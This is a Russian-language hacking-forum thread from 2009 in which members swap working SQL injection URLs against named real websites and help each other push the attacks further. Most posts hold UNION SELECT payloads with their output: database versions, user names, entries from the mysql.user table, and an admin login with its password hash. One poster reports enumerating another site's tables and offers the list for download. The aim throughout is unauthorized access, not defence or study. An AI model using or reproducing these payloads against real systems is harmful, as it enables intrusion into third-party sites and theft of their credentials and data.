 |
|
06.01.2009, 21:35
|
|
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
С нами:
9326973
Репутация:
-25
|
|
Сообщение от MatriX30000
скажите пожалуйсто а рейтинг в контакте имеет уязвимости???
Почитай статьи про уязвимости а потом задавай вопросы !!!
|
|
|
06.01.2009, 22:44
|
|
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
С нами:
9326973
Репутация:
-25
|
|
Сообщение от :o)
если я не ошибаюсь то если переменной не присваивается значение, то поле её вывода остается пустым, т.к. допустим:
$para = "";
echo $para;
Так вот если в переменную $para нихрена не поступает, то она и выводет пустое поле... а так как у тебя значение echo прописано в двойной ковычке, то это если ты не знал, обозначает для пхп, что следующий текст не нужно интерпритировать...
А как тогда она выводится???
|
|
|
|
06.01.2009, 22:49
|
|
Познающий
Регистрация: 14.12.2007
Сообщений: 79
С нами:
9688243
Репутация:
75
|
|
Вообщем, дело такое.
тут я, вроде бы, что-то как-то разобрался:
http://www.gps-ru.ru/index.php?sn=-rbc805%27+union+select+1,2,3,4,5,6,7,concat_ws(0x3 a,version(),0x3a,user(),0x3a,database())/*
4.1.20 : grantsps@localhost : grantsps
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.gps-ru.ru/index.php?sn=-rbc805%27+union+select+1,2,3,4,5,6,7,concat_ws(0x3 a,id,login,password)+from+users/*
1 : off-docnescott : 977dd41592714ff1b63f9ea806c6e150
gnutella
правда, куда этот логин/пасс втыкать не въехал (http://www.gps-ru.ru/admin не катит)
есть еще вот такое срамотный сайт:
http://www.glaad.org/action/calls_archive_detail.php?id=-4805+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20/*
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.glaad.org/action/calls_archive_detail.php?id=-4805+union+select+1,2,3,4,5,concat_ws(0x3a,version (),0x3a,user(),0x3a,database()),7,8,9,10,11,12,13, 14,15,16,17,18,19,20/*
>> 4.0.12-standard : glaad@localhost : glaad_www_1
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.glaad.org/action/calls_archive_detail.php?id=-4805+union+select+1,2,3,4,5,concat(user,0x3a,passw ord),7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+m ysql.user+limit+0,1/*
>> root:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.glaad.org/action/calls_archive_detail.php?id=-4805+union+select+1,2,3,4,5,concat(user,0x3a,host) ,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+mysql .user+limit+0,1/*
>> andy : 66.28.254.%
вот во 2-м случае я не понял: кто такой andy[B]? и как бы мне найти логин/пароль как из 1-го случая.... |
|
|
|
06.01.2009, 23:36
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
С нами:
10692266
Репутация:
3486
|
|
Сообщение от :o)
во-втором случае тебе нужно вручную подобрать колонку в которой хранится информация о пользователях системы типа user, по другому никак
Тебе флудом мозги съело? Он вручную будет подбирать дефолтную структуру таблицы мускуля? Омфг.
Код:
mysql> select column_name from information_schema.columns where table_name='mysql.user';
+-----------------------+
| column_name |
+-----------------------+
| Host |
| User |
| Password |
| Select_priv |
| Insert_priv |
| Update_priv |
| Delete_priv |
| Create_priv |
| Drop_priv |
| Reload_priv |
| Shutdown_priv |
| Process_priv |
| File_priv |
| Grant_priv |
| References_priv |
| Index_priv |
| Alter_priv |
| Show_db_priv |
| Super_priv |
| Create_tmp_table_priv |
| Lock_tables_priv |
| Execute_priv |
| Repl_slave_priv |
| Repl_client_priv |
| Create_view_priv |
| Show_view_priv |
| Create_routine_priv |
| Alter_routine_priv |
| Create_user_priv |
| ssl_type |
| ssl_cipher |
| x509_issuer |
| x509_subject |
| max_questions |
| max_updates |
| max_connections |
| max_user_connections |
+-----------------------+
37 rows in set
|
|
|
|
06.01.2009, 23:42
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
С нами:
10077446
Репутация:
1020
|
|
Сообщение от 4adr0s
Вообщем, дело такое.
тут я, вроде бы, что-то как-то разобрался:
правда, куда этот логин/пасс втыкать не въехал (http://www.gps-ru.ru/admin не катит)
а ты уверен что off-docnescott - это админ?
Сообщение от 4adr0s
вот во 2-м случае я не понял: кто такой andy[B]? и как бы мне найти логин/пароль как из 1-го случая....
поробу вот так:
http://www.glaad.org/action/calls_archive_detail.php?id=-4805+union+select+1,2,3,4,5,concat_ws(0x3a,user,pa ssword,host,file_priv) ,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+mysql .user+where+host='%'/*
|
|
|
|
07.01.2009, 00:45
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
С нами:
10109126
Репутация:
1980
|
|
Сообщение от geforce
Как никак! Если запрос http://dom2.ru/heroes/1697' проходит и переменая $hero.name не проверяется вот и по этому она выводится! так как она пустая функция echo выводит её не как переменю а как текст! Пример echo ("$hero.name"); из этого следует что запрос к базе прошел!!! Я не прав?
$hero.name - это не переменная, присваивающая входящие данные, а скорее всего обозначение для шаблонизатора, куда он должен вставлять соответствующие данные из базы данных или файлов. Уязвимости в данном случае нет.
|
|
|
|
07.01.2009, 02:41
|
|
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
С нами:
9326973
Репутация:
-25
|
|
Сообщение от [Raz0r]
$hero.name - это не переменная, присваивающая входящие данные, а скорее всего обозначение для шаблонизатора, куда он должен вставлять соответствующие данные из базы данных или файлов. Уязвимости в данном случае нет.
http://dom2.ru/magazine/numbers/1308392'
а вот это? 
|
|
|
|
07.01.2009, 03:10
|
|
Познающий
Регистрация: 13.03.2007
Сообщений: 55
С нами:
10085912
Репутация:
17
|
|
это тоже самое
|
|
|
|
07.01.2009, 03:30
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами:
9846041
Репутация:
1177
|
|
http://www.democracy.ru/article.php?id=-1+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12 ,13,14,15,16+from+information_schema.tables+limit+ 176,20000--
помогите это докрутить =))
уже 2 часа епусь)) все таблицы перебрал и ничего =((
|
|
|
|
07.01.2009, 03:40
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
А чего там перебирать-то? Вот все данные, всего 244 таблицы, есть и интересные:
PHP код:
=============================
www.democracy.ru
75.101.142.224
=============================
-------
Версия MySQL:
5.0.45
-------
Имя базы:
iesd
-------
Юзер:
alex@localhost
-------
@@basedir:
/usr/
-------
@@datadir:
/var/lib/mysql/
-------
@@tmpdir:
/tmp/
-------
@@version_compile_os:
redhat-linux-gnu
-------
Список таблиц сюда не влез, скачать здесь можно:
http://slil.ru/26513292
дел на 4 минуты  |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Raz0r]](/avatars/avatar33548.jpg?1040470){kind=avatar}
Похожие темы
Линейный вид
